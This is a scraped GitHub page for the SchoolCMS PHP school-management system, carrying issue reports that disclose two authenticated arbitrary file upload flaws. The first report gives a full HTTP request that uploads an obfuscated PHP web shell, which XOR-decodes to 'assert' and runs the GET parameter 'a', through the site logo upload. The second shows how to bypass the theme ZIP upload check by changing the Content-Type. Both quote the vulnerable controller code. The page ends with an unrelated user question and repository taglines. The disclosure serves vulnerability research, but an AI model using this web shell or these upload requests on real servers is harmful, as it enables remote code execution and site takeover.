gongfuxiang / schoolcms Goto Github PK
View Code? Open in Web Editor NEW**首个开源学校教务管理系统、网站布局自动化、学生/成绩/教师、成绩查询
License: Apache License 2.0
**首个开源学校教务管理系统、网站布局自动化、学生/成绩/教师、成绩查询
License: Apache License 2.0
Detail:
Http:
POST /admin.php?m=Admin&c=Site&a=Save HTTP/1.1
Host: schoolcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20557339626727
Content-Length: 2437
Origin: http://schoolcms.com
Connection: close
Referer: http://schoolcms.com/admin.php?m=Admin&c=Site&a=Index
Cookie: PHPSESSID=7hb5r5vqt11i3m5l3hojh68rf2; think_language=zh-CN
-----------------------------20557339626727
Content-Disposition: form-data; name="max_file_size"
2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_name"
SchoolCMS
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo_img"; filename="test.php"
Content-Type: text/php
<?php
$shang='tpY<$*'^"\x15\x3\x2a\x59\x56\x5e";
@$shang($_GET['a']);
?>
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo"
/Public/Upload/Home/image/home_logo.php
-----------------------------20557339626727
Content-Disposition: form-data; name=""
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_image"
2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_file"
51200000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_video"
102400000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_content_max_width"
1200
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_close_reason"
å��级ä¸...
-----------------------------20557339626727
Content-Disposition: form-data; name=""
-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_expire_time"
600
-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_time_interval"
30
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_icp"
1111
-----------------------------20557339626727
Content-Disposition: form-data; name="home_footer_info"
111
-----------------------------20557339626727
Content-Disposition: form-data; name="common_timezone"
Asia/Shanghai
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_state"
1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_login_state"
1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_img_verify_state"
1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_reg_state"
sms,email
-----------------------------20557339626727--
code: WWW\schoolcms\Application\Admin\Controller\SiteController.class.php
public function Save()
{
// 站点logo
if(isset($_FILES['home_site_logo_img']['error']))
{
// 文件上传校验
$error = FileUploadError('home_site_logo_img');
if($error !== true)
{
$this->ajaxReturn($error, -1);
}
// 文件类型
list($type, $suffix) = explode('/', $_FILES['home_site_logo_img']['type']);
$path = 'Public/Upload/Home/image/';
if(!is_dir($path))
{
mkdir(ROOT_PATH.$path, 0777, true);
}
$filename = 'home_logo.'.$suffix;
$home_site_logo = $path.$filename;
if(move_uploaded_file($_FILES['home_site_logo_img']['tmp_name'], ROOT_PATH.$home_site_logo))
{
$_POST['home_site_logo'] = '/'.$home_site_logo;
}
}
// 站点状态值处理
if(!isset($_POST['home_user_reg_state']))
{
$_POST['home_user_reg_state'] = '';
}
// 基础配置
$this->MyConfigSave();
}
}
?>
POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 502
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"
51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/x-zip-compressed
���
c=theme -> Controller=theme, a=upload -> action=upload. /schoolcms/Application/Admin/Controller/ThemeController.class.php Line 180:
public function Upload()
{
// 是否ajax
if(!IS_AJAX)
{
$this->error(L('common_unauthorized_access'));
}
// 文件上传校验
$error = FileUploadError('theme');
if($error !== true)
{
$this->ajaxReturn($error, -1);
}
// 文件格式化校验
$type = array('application/zip', 'application/octet-stream');
if(!in_array($_FILES['theme']['type'], $type))
{
$this->ajaxReturn(L('theme_upload_error'), -2);
}
// 开始解压文件
$resource = zip_open($_FILES['theme']['tmp_name']);
while(($temp_resource = zip_read($resource)) !== false)
{
if(zip_entry_open($resource, $temp_resource))
{
// 当前压缩包中项目名称
$file = zip_entry_name($temp_resource);
// 排除临时文件和临时目录
if(strpos($file, '/.') === false && strpos($file, '__') === false)
{
// 拼接路径
if(strpos($file, '_Html') !== false)
{
$file = $this->html_path.$file;
} else if(strpos($file, '_Static') !== false)
{
$file = $this->static_path.$file;
} else {
continue;
}
$file = str_replace(array('_Static/', '_Html/'), '', $file);
// 截取文件路径
$file_path = substr($file, 0, strrpos($file, '/'));
// 路径不存在则创建
if(!is_dir($file_path))
{
mkdir($file_path, 0777, true);
}
// 如果不是目录则写入文件
if(!is_dir($file))
{
// 读取这个文件
$file_size = zip_entry_filesize($temp_resource);
$file_content = zip_entry_read($temp_resource, $file_size);
file_put_contents($file, $file_content);
}
// 关闭目录项
zip_entry_close($temp_resource);
}
}
}
$this->ajaxReturn(L('common_operation_success'));
}
}
check Content-Type, default is "application/x-zip-compressed", not in array
// 文件格式化校验
$type = array('application/zip', 'application/octet-stream');
if(!in_array($_FILES['theme']['type'], $type))
{
$this->ajaxReturn(L('theme_upload_error'), -2);
}
unzip, check filename, if filename does not contain "_Html" or "_Static" , it will Jump to the next loop.
while(($temp_resource = zip_read($resource)) !== false)
{
if(zip_entry_open($resource, $temp_resource))
{
// 当前压缩包中项目名称
$file = zip_entry_name($temp_resource);
// 排除临时文件和临时目录
if(strpos($file, '/.') === false && strpos($file, '__') === false)
{
// 拼接路径
if(strpos($file, '_Html') !== false)
{
$file = $this->html_path.$file;
} else if(strpos($file, '_Static') !== false)
{
$file = $this->static_path.$file;
} else {
continue;
}
html_path,static_path: Line 14
private $html_path;
private $static_path;
/**
* [_initialize 前置操作-继承公共前置方法]
* @author Devil
* @blog http://gong.gg/
* @version 0.0.1
* @datetime 2016-12-03T12:39:08+0800
*/
public function _initialize()
{
// 调用父类前置方法
parent::_initialize();
// 登录校验
$this->Is_Login();
// 权限校验
$this->Is_Power();
// 静态目录和html目录
$this->html_path = 'Application'.DS.'Home'.DS.'View'.DS;
$this->static_path = 'Public'.DS.'Home'.DS;
}
DS: /schoolcms/core.php Line 47
/* 定义系统目录分隔符 */
define('DS', DIRECTORY_SEPARATOR);
static_path = '\Public\Home\'
write to file
$file_size = zip_entry_filesize($temp_resource);
$file_content = zip_entry_read($temp_resource, $file_size);
file_put_contents($file, $file_content);
set Content-Type=application/zip and filename=test_Static.php
POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 489
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"
51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/zip
���
upload success:
你好,请问在php7下总是安装提示连接数据库失败,这是什么情况呢
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.